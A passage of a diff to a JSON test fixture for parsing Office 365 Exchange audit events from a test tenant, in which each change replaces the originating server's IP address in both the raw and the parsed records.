(15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -368,7 +368,7 @@ "Operation": "Set-OwaMailboxPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "InstantMessagingType", @@ -390,7 +390,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -402,7 +402,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -476,7 +476,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -488,7 +488,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -562,7 +562,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -574,7 +574,7 @@ "Operation": "Enable-AddressListPaging", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DoNotUpdateRecipients", @@ -600,7 +600,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -612,7 +612,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -686,7 +686,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -698,7 +698,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -772,7 +772,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT 